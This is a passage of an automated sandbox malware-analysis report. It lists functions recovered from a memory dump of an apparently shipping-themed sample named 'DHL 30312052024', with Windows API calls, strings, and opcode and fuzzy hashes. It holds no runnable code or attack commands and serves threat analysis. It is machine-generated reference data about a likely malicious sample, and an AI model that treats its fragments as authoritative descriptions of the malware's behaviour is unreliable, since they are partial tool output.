                                                                                        • Instruction Fuzzy Hash: 39210375A00209EFCF05EF98D840CAE7BB5FB4D344B404258FD12A7360DA31AE65DBA4
                                                                                        Function 00C865B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00C8662C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u$button
                                                                                        • API String ID: 3850602802-1762282863
                                                                                        • Opcode ID: b293f9d99764bcb5d3b8f666584153cebe8f0cad8ff1083e182c366cb08b6070
                                                                                        • Instruction ID: e55c6e6102cc9548201049933a464f43e6edac07e4be7bfb21e94fbc2fbd0cfd
                                                                                        • Opcode Fuzzy Hash: b293f9d99764bcb5d3b8f666584153cebe8f0cad8ff1083e182c366cb08b6070
                                                                                        • Instruction Fuzzy Hash: 4C110432150209ABDF11AF60CC11FEA376AFF08318F144218FE61A7190D776EC91AB14
                                                                                        Function 00C8788C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00C878D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 839a4b3390f1361410c3c114a62ee2a4a04936cb77cd956222a0ed35f74bdd61
                                                                                        • Instruction ID: cc87810640de873ea704b6b163d6dd72301bf821db33312cc0ae4fba19878e49
                                                                                        • Opcode Fuzzy Hash: 839a4b3390f1361410c3c114a62ee2a4a04936cb77cd956222a0ed35f74bdd61
                                                                                        • Instruction Fuzzy Hash: BF11B130504744AFDB21DF34C891AE7B7E9BF05314F20861DE8AA57291EB7169419B60
                                                                                        Function 00C594A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C59296,?,?,00000034,00000800,?,00000034), ref: 00C614E6
                                                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C59509
                                                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C5952E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MemoryProcessWrite
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 1195347164-2594219639
                                                                                        • Opcode ID: 33c719c6b91acc39c8e84a9dc95fa6b0e298084d766bbdd02fd3ff884d5117d5
                                                                                        • Instruction ID: 7ac6d222d38943d598010e565a387f77d40c46d67ec202656fa729714f837714
                                                                                        • Opcode Fuzzy Hash: 33c719c6b91acc39c8e84a9dc95fa6b0e298084d766bbdd02fd3ff884d5117d5
                                                                                        • Instruction Fuzzy Hash: FE010832900218EBDB21AF24DC86FEEBB78DB04311F10026AF915A7191EA706E95DB60
                                                                                        Function 00C68D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock_memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 1988441806-3962188686
                                                                                        • Opcode ID: 75c1e2e0b2cf3487a5318d68d6c8b0b953b6383259a9867d58d3b09d11053fd7
                                                                                        • Instruction ID: fa076ed7735a9bbf6272fbd380b3b3a6e8649ca157d7e8a9b81f4d09b7fc9461
                                                                                        • Opcode Fuzzy Hash: 75c1e2e0b2cf3487a5318d68d6c8b0b953b6383259a9867d58d3b09d11053fd7
                                                                                        • Instruction Fuzzy Hash: 6B01F9719042287EDB28CAA8D856EFE7BFCDB11301F00419BF552D2181E875E6089760
                                                                                        Function 00C595D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00C595FB
                                                                                        • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00C5962E
                                                                                          • Part of subcall function 00C61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C614B1
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MemoryProcessRead_memmove
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 339422723-2594219639
                                                                                        • Opcode ID: 77fba038347c261ae1610e35f0650f963884ae0729cd05c8e43f035afeb3d809
                                                                                        • Instruction ID: bcc3dfd2fdc1821f4a9f0663b8874003601720ebd3b18775056b1f9310a872e1
                                                                                        • Opcode Fuzzy Hash: 77fba038347c261ae1610e35f0650f963884ae0729cd05c8e43f035afeb3d809
                                                                                        • Instruction Fuzzy Hash: 8A015B75900118AFDB60AE50CC81ED977BCEB14341F9081AABA4996151DE315E89EF90
                                                                                        Function 00C8C57D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00C3B93A,?,?,?), ref: 00C8C5F1
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00C8C5D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageProcSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 982171247-2594219639
                                                                                        • Opcode ID: 9bb61ba738c013553da81f9f19859f664b0ac47e0ea86c2354b2d401b2184f9d
                                                                                        • Instruction ID: 8c3ccca959690a04b9b20d12a7b15b9b1fee74a78f5f00448aad757fa0dbe2c7
                                                                                        • Opcode Fuzzy Hash: 9bb61ba738c013553da81f9f19859f664b0ac47e0ea86c2354b2d401b2184f9d
                                                                                        • Instruction Fuzzy Hash: 4101B531200614ABCF216F14CC98F6A3BA6FB85768F140128F9511B2E1CB31B952EB64
                                                                                        Function 00C5953C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C5954C
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C59564
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 67fd542eb13285a9f8e03042cf87abf50b2086d388843358bd9079b23239ffe4
                                                                                        • Instruction ID: 5c6e1e88b584ad8c36b212ddee4f0ee67885bfe55a4e320a539c8421c060199a
                                                                                        • Opcode Fuzzy Hash: 67fd542eb13285a9f8e03042cf87abf50b2086d388843358bd9079b23239ffe4
                                                                                        • Instruction Fuzzy Hash: 75E02339341321F6F23116654C4AFD71F15DB48BA2F540134FF01550D1E5E10DD653A4
                                                                                        Function 00C59CC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C59CD8
                                                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C59D08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: d78fb51e56b960bab88552ec68176cee1c831915ccf5408b25c2a0564c2ab9ca
                                                                                        • Instruction ID: 17f487aa449669a9dcc303049d160680e15bc65af601ddc9cfbf353639bedb1d
                                                                                        • Opcode Fuzzy Hash: d78fb51e56b960bab88552ec68176cee1c831915ccf5408b25c2a0564c2ab9ca
                                                                                        • Instruction Fuzzy Hash: 77F0A735240314BBEA156A50DC46FDA3B68EB18752F200128FB051A0E1D5E25D80A7A8
                                                                                        Function 00C64F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: 76f1af8cd18f726f1154ad8efd7b48d50f193bea4bc2ce57030dad96c16298dc
                                                                                        • Instruction ID: ffd1b402b9fe8b29ca6c5295b412d789f32bc52298e43614aaef33ba86471ed6
                                                                                        • Opcode Fuzzy Hash: 76f1af8cd18f726f1154ad8efd7b48d50f193bea4bc2ce57030dad96c16298dc
                                                                                        • Instruction Fuzzy Hash: 52E0D8326002382BE7209B99EC49FABF7ACEB55B70F10006BFD04D3051D960AB45C7E1
                                                                                        Function 00C3B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C3B314: _memset.LIBCMT ref: 00C3B321
                                                                                          • Part of subcall function 00C20940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C3B2F0,?,?,?,00C0100A), ref: 00C20945
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00C0100A), ref: 00C3B2F4
                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C0100A), ref: 00C3B303
                                                                                        Strings
                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C3B2FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                        • API String ID: 3158253471-631824599
                                                                                        • Opcode ID: 590137be70d5c71fb19466585e11c61a300f78799977f9f1967fe38626464563
                                                                                        • Instruction ID: 4ff2d67a9200e6b67bbb1f5d88bb44e2ded6534c91299e94d0f09591f579110c
                                                                                        • Opcode Fuzzy Hash: 590137be70d5c71fb19466585e11c61a300f78799977f9f1967fe38626464563
                                                                                        • Instruction Fuzzy Hash: 33E092F02107218FDB60EF28E4047467BE4AF00308F10893DE496C7661EBB4E884CBA1
                                                                                        Function 00C41935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00C41775
                                                                                          • Part of subcall function 00C7BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C4195E,?), ref: 00C7BFFE
                                                                                          • Part of subcall function 00C7BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C7C010
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C4196D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 582185067-3257408948
                                                                                        • Opcode ID: cf6ba1cf651189935fd0500554df7bc2066b30ddd0ef8ee400e7771480b71063
                                                                                        • Instruction ID: 0c9fd811ac29177f62d3a1a98149882c6649d41f933704d6bce10ec8cac7e1c5
                                                                                        • Opcode Fuzzy Hash: cf6ba1cf651189935fd0500554df7bc2066b30ddd0ef8ee400e7771480b71063
                                                                                        • Instruction Fuzzy Hash: 5EF0ED70C04109DFDB15DB91C988BECBBF8BB08301F680095F562A20A0D7759F85DF64
                                                                                        Function 00C85998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C859AE
                                                                                        • PostMessageW.USER32(00000000), ref: 00C859B5
                                                                                          • Part of subcall function 00C65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: c51f327dbfbafe35bb11723f33c50205b2e1594edbf0c59aaf274736f10c0440
                                                                                        • Instruction ID: 0f9c10b556d61a65311a73051721d671e6f2430762faaafa53146adc87182002
                                                                                        • Opcode Fuzzy Hash: c51f327dbfbafe35bb11723f33c50205b2e1594edbf0c59aaf274736f10c0440
                                                                                        • Instruction Fuzzy Hash: AAD0C9313C43117AE674BB709C4BFDA6614AB04B50F100839B245AA1D0D9E0A805C758
                                                                                        Function 00C85964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C8596E
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C85981
                                                                                          • Part of subcall function 00C65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 4d90cb3e0f8f183604529e092dbb89218f61f57772afb7cbc8a2c632cb495e5c
                                                                                        • Instruction ID: 4340eb61a1a09cf75e49a561228a652ead039611c572d5885a9c2002c9071fb2
                                                                                        • Opcode Fuzzy Hash: 4d90cb3e0f8f183604529e092dbb89218f61f57772afb7cbc8a2c632cb495e5c
                                                                                        • Instruction Fuzzy Hash: 98D0C931384311B6E674BB709C5BFDA6A14AF00B50F100839B249AA1D0D9E0A805C758
                                                                                        Function 00C593DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C593E9
                                                                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00C593F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 1439ef4c2ded262467a550c7ca7e6a77f13c897f6c7cb3d5e7ee57a30f994e70
                                                                                        • Instruction ID: 566790dfcc252aa8b165ee13ef178ec09a178c76897fb40d787cc9575b11071b
                                                                                        • Opcode Fuzzy Hash: 1439ef4c2ded262467a550c7ca7e6a77f13c897f6c7cb3d5e7ee57a30f994e70
                                                                                        • Instruction Fuzzy Hash: 99C00231151194BAEA211B77AC0DE8B3E3DE7CAF52721026CB211950B596650096D628